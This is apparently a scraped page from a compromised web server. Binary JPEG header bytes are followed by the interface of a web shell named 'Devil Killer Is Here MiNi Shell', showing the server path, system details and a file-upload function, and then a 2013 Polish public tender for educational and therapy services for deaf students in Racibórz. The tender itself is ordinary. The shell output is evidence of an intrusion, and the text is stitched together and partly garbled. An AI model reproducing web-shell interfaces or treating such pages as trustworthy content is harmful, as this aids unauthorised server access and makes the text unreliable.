JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130916/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130916/374828-N-2013.html

<p class="kh_header"><b>Racibórz: Usługi w zakresie organizacji i przeprowadzenia zajęć dydaktyczno - wyrównawczych, zajęć pozalekcyjnych i pozaszkolnych, doradztwa i opieki pedagogiczno - psychologicznej, terapii i doradztwa edukacyjno - zawodowego dla niepełnosprawnych -  niesłyszących, słabosłyszących oraz z lekkim upośledzeniem, uczniów szkół ponadgimnazjalnych w SOSWNIS w Raciborzu - części 1 - 16</b><br>
<b>Numer ogłoszenia: 374828 - 2013; data zamieszczenia: 16.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Specjalny Ośrodek Szkolno-Wychowawczy dla Niesłyszących i Słabosłyszących , ul. Karola Miarki 4, 47-400 Racibórz, woj. śląskie, tel. 032 4147334, 4152255, 4153001, faks 032 4147334, 4152255 w. 42.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.oswnis.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi w zakresie organizacji i przeprowadzenia zajęć dydaktyczno - wyrównawczych, zajęć pozalekcyjnych i pozaszkolnych, doradztwa i opieki pedagogiczno - psychologicznej, terapii i doradztwa edukacyjno - zawodowego dla niepełnosprawnych -  niesłyszących, słabosłyszących oraz z lekkim upośledzeniem, uczniów szkół ponadgimnazjalnych w SOSWNIS w Raciborzu - części 1 - 16.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> usługi w zakresie organizacji i przeprowadzenia zajęć dydaktyczno - wyrównawczych, zajęć pozalekcyjnych i pozaszkolnych, doradztwa i opieki pedagogiczno - psychologicznej, terapii i doradztwa edukacyjno - zawodowego dla niepełnosprawnych -  niesłyszących, słabosłyszących oraz z lekkim upośledzeniem, uczniów szkół ponadgimnazjalnych w Specjalnym Ośrodku  Szkolno - Wychowawczym dla Niesłyszących i Słabosłyszących w Raciborzu.  Ze względu na różny charakter zajęć przedmiot zamówienia został podzielony na części - zadania 1 - 16, w tym:
Część 1 - Zajęcia wyrównawcze z języka polskiego - kółko polonistyczne Sztuka słowa
- liczba wymaganych nauczycieli: 2 
- ilość godzin lekcyjnych do zrealizowania w latach 2013 - 2015: 240 godz.
Część 2 - Dodatkowe zajęcia dydaktyczno-wyrównawcze z przedmiotu zawodowego florystyka
- liczba wymaganych nauczycieli: 2
- ilość godzin lekcyjnych do zrealizowania w latach 2013 - 2015: 240 godz.
Część 3 - Dodatkowe zajęcia dydaktyczno-wyrównawcze z przedmiotu zawodowego krawiectwo
- liczba wymaganych nauczycieli:  1
- ilość godzin lekcyjnych do zrealizowania w latach 2013 - 2015: 50 godz.
Część 4 - Dodatkowe zajęcia dydaktyczno-wyrównawcze z przedmiotu zawodowego fotografia
- liczba wymaganych nauczycieli: 2 oraz 1 instruktor,
- ilość godzin lekcyjnych do zrealizowania w latach 2013-2015:  240 godz.
Część 5 - Dodatkowe zajęcia dydaktyczno-wyrównawcze z przedmiotu zawodowego informatyka
- liczba wymaganych nauczycieli:  2
- ilość godzin lekcyjnych do zrealizowania w latach 2013-2015:  196 godz.
Część 6 - Dodatkowe zajęcia dydaktyczno-wyrównawcze z przedmiotu zawodowego gastronomia
- liczba wymaganych nauczycieli:  1
- ilość godzin lekcyjnych do zrealizowania w latach 2013-2015:  160 godz.
Część 7 - Dodatkowe zajęcia dydaktyczno-wyrównawcze z przedmiotu zawodowego, stolarstwo
- liczba wymaganych nauczycieli:  1
- ilość godzin lekcyjnych do zrealizowania w latach 2013-2015: 160 godz.
Część 8 -  Dodatkowe zajęcia pozalekcyjne i pozaszkolne z  matematyki
- liczba wymaganych nauczycieli:  1
- ilość godzin lekcyjnych do zrealizowania w latach 2013-2015: 96 godz.
Część 9 -  Dodatkowe zajęcia pozalekcyjne i pozaszkolne z informatyki
- liczba wymaganych nauczycieli:  1
- ilość godzin lekcyjnych do zrealizowania w latach 2013-2015: 38 godz.
Część 10 - Dodatkowe zajęcia pozalekcyjne i pozaszkolne z języka angielskiego English Masters Club
- liczba wymaganych nauczycieli:  2
- ilość godzin lekcyjnych do zrealizowania w latach 2013-2015: 168 godz.
Część 11 - Dodatkowe zajęcia pozalekcyjne i pozaszkolne z przedsiębiorczości
- liczba wymaganych nauczycieli:  1
- ilość godzin lekcyjnych do zrealizowania w latach 2013-2015:  96 godz.
- liczba wymaganych tłumaczy języka migowego: 1
- ilość godzin lekcyjnych do zrealizowania w latach 2013-2015: 40 godz.
Część 12 - Doradztwo i opieka pedagogiczno-psychologiczna
- liczba wymaganych nauczycieli:  2
- ilość godzin lekcyjnych do zrealizowania w latach 2013-2015: 88 godz.
Część 13 - Zajęcia w ramach terapii artystycznej - teoretyczne i praktyczne
- liczba wymaganych nauczycieli:  2 nauczycieli
- ilość godzin lekcyjnych do zrealizowania w latach 2013-2015: 192 godz.,
- liczba wymaganych instruktorów:  1 instruktor oraz 1 tłumacz języka migowego
- ilość godzin lekcyjnych do zrealizowania:  240 godz. 
Część 14 - Zajęcia w ramach terapii ruchowej:
- liczba wymaganych nauczycieli: 1
- ilość godzin lekcyjnych do zrealizowania w latach 2013-2015: 144 godz.
Część 15 - Zajęcia w ramach terapii teatralno - muzycznej
- liczba wymaganych nauczycieli: 2
- ilość godzin lekcyjnych do zrealizowania w latach 2013-2015:  382 godz.
Część 16 - Doradztwo edukacyjno - zawodowe
- liczba wymaganych nauczycieli:  1
- ilość godzin lekcyjnych do zrealizowania w latach 2013-2015: 120 godz.
2.	Szczegółowy opis przedmiotu zamówienia został określony w załączniku nr 1 SIWZ.
Wymagania Zamawiającego: 
1)	Wykonawca zobowiązany będzie do organizacji i przeprowadzenia zajęć dydaktycznych mających na celu zwiększenie teoretycznej i praktycznej wiedzy uczniów.
2)	Wykonawca zobowiązany jest zapewnić wymaganą kadrę dydaktyczną posiadającą kwalifikacje i doświadczenie w prowadzeniu zajęć będących przedmiotem zamówienia oraz  mającą odpowiednie przygotowanie i doświadczenie w pracy z uczniami niepełnosprawnymi -  niesłyszącymi, słabosłyszącymi oraz z lekkim upośledzeniem. Przed podpisaniem umowy Wykonawca przedstawi Zamawiającemu dokumenty potwierdzające wymagane kwalifikacje i doświadczenia zawodowe osób przeznaczonych do realizacji zadania wykazanych w załączniku nr 4 - Wykaz kadry .
3)	Przed rozpoczęciem zajęć Wykonawca przedstawi Zamawiającemu do akceptacji szczegółowy program oraz harmonogram zajęć na okres do końca grudnia 2013r. Kolejne semestralne harmonogramy Wykonawca zobowiązany będzie przedstawić Zamawiającemu przed rozpoczęciem następnego semestru.
4)	Wykonawca zobowiązany jest do przeniesienia na Zamawiającego praw autorskich do opracowanych materiałów szkoleniowych.
5)	Wykonawcę zobowiązuje się do systematycznego prowadzenia szczegółowej dokumentacji oraz do przygotowania i przeprowadzenia wśród uczestników zajęć sprawdzianów wiedzy i umiejętności przed rozpoczęciem zajęć, w trakcie realizacji i po ich zakończeniu w celu dokonania ewaluacji.
6)	Prowadzący zajęcia będą poddawani się hospitacji i kontroli (w tym niezapowiedzianej)  prowadzonej przez upoważnionego pracownika Zamawiającego oraz przez uprawnione organy nadzoru.
7)	W przypadku utworzenia przez Zamawiającego  platformy E-lerning,  prowadzący zajęcia nauczyciele, po uprzednim ich przeszkoleniu, będą zobowiązani do korzystania z tego narzędzia.
8)	Wszelka dokumentacja związana z przedmiotem zamówienia oraz materiały szkoleniowe winne być oznakowane logo projektu  PO KL zgodnie z aktualnie obowiązującymi wytycznymi.
Wartość szacunkowa zamówienia nie przekracza kwoty określonej w przepisach wydanych na podstawie art. 11 ust. 8 ustawy z dnia 29 stycznia 2004 Prawo zamówień publicznych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 16.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 26.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa  szczegółowego warunku udziału w postępowaniu. Zamawiający dokona oceny spełnienia  tego warunku na podstawie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa  szczegółowego warunku udziału w postępowaniu. Zamawiający dokona oceny spełnienia  tego warunku na podstawie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa  szczegółowego warunku udziału w postępowaniu. Zamawiający dokona oceny spełnienia  tego warunku na podstawie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4)	W zakresie dysponowania  osobami zdolnymi do wykonania zamówienia.
Zamawiający wymaga, aby wykonawca wykazał, że dysponuje lub będzie dysponował osobami dla każdej części zamówienia posiadającymi:
a) odpowiednie wykształcenie wyższe lub spełnienie kryteriów określonych w Rozporządzeniu Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli, a w zakresie części 12 pełne kwalifikacje do zajmowania stanowiska pedagoga szkolnego;
b) stopień nauczyciela kontraktowego/mianowanego/dyplomowanego, zgodnie z Ustawą Karta Nauczyciela;
c) kurs kwalifikacyjny: obligatoryjnie -surdopedagogika, fakultatywnie - oligofrenopedagogika;
d) minimum 2-letnie doświadczenie w prowadzeniu zajęć określonych w opisie przedmiotu zamówienia z  uczniami niepełnosprawnymi -  niesłyszącymi, słabosłyszącymi lub z upośledzeniem.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa  szczegółowego warunku udziału w postępowaniu. Zamawiający dokona oceny spełnienia  tego warunku na podstawie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje zmiany zawartej umowy dotyczące odpowiednio wartości zamówienia, sposobu lub terminu realizacji zamówienia w przypadku zaistnienia następujących okoliczności:
1)	w razie konieczności podjęcia działań zmierzających do ograniczenia skutków zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, szczególnie zagrażające bezpośrednio życiu lub zdrowiu ludzi lub grożące powstaniem szkody znacznych rozmiarach;
2)	z  powodu działań osób trzecich uniemożliwiających wykonanie umowy, które to działania nie są konsekwencją winy którejkolwiek ze stron;
3)	z powodu zmiany w sposobie realizacji zamówienia lub zmian organizacyjnych polegających na zmianie osób lub innych podmiotów współpracujących przy realizacji zamówienia pod warunkiem, że ich uprawnienia, potencjał ekonomiczny, wykonawczy i doświadczenie nie będą gorsze od tych, jakie posiadają podmioty zmieniane;
4)	w razie ustawowych zmian stawki podatku od towarów i usług VAT;
5)	w przypadku zmian,  których na dzień podpisania Umowy Zamawiający nie był w stanie przewidzieć, dotyczących zmiany liczby godzin prowadzonych zajęć, rozwiązanie grupy, przerwanie projektu, zmiana dotycząca aktualnych potrzeb uczestników projektu - nastąpi proporcjonalne zmniejszenie wartości wynagrodzenia, do czego Wykonawca nie będzie rościł żadnych praw.
2.	Zmiana warunków umowy nastąpi na podstawie podpisanego przez Strony aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.oswnis.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specjalny Ośrodek Szkolno - Wychowawczy dla Niesłyszących i Słabosłyszących, ul. Karola Miarki 4,  47-400 Racibórz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.09.2013 godzina 10:00, miejsce: Siedziba Zamawiającego - Racibórz ul. Karola Miarki 4 - w budynku Szkoły Podstawowej (budynek administracyjny) - parter pokój nr 1.1 - Biuro podawcze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane jest w ramach projektu Wyrównywanie szans edukacyjnych i zawodowych uczniów niepełnosprawnych. Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki,  Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.2 Podniesienie atrakcyjności szkolnictwa zawodowego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zajęcia wyrównawcze z języka polskiego - kółko polonistyczne -Sztuka słowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - liczba wymaganych nauczycieli: 2 
- ilość godzin lekcyjnych do zrealizowania w latach 2013 - 2015: 240 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dodatkowe zajęcia dydaktyczno-wyrównawcze z przedmiotu zawodowego florystyka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - liczba wymaganych nauczycieli: 2
- ilość godzin lekcyjnych do zrealizowania w latach 2013 - 2015: 240 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dodatkowe zajęcia dydaktyczno-wyrównawcze z przedmiotu zawodowego krawiectwo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - liczba wymaganych nauczycieli:  1
- ilość godzin lekcyjnych do zrealizowania w latach 2013 - 2015: 50 godz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dodatkowe zajęcia dydaktyczno-wyrównawcze z przedmiotu zawodowego fotografia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - liczba wymaganych nauczycieli: 2 + 1 instruktor,
- ilość godzin lekcyjnych do zrealizowania w latach 2013-2015:  240 godz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dodatkowe zajęcia dydaktyczno-wyrównawcze z przedmiotu zawodowego informatyka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - liczba wymaganych nauczycieli:  2
- ilość godzin lekcyjnych do zrealizowania w latach 2013-2015:  196 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dodatkowe zajęcia dydaktyczno-wyrównawcze z przedmiotu zawodowego gastronomia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - liczba wymaganych nauczycieli:  1
- ilość godzin lekcyjnych do zrealizowania w latach 2013-2015:  160 godz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dodatkowe zajęcia dydaktyczno-wyrównawcze z przedmiotu zawodowego stolarstwo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - liczba wymaganych nauczycieli:  1
- ilość godzin lekcyjnych do zrealizowania w latach 2013-2015: 160 godz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dodatkowe zajęcia pozalekcyjne i pozaszkolne z  matematyki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - liczba wymaganych nauczycieli:  1
- ilość godzin lekcyjnych do zrealizowania w latach 2013-2015: 96 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6.</p></li>
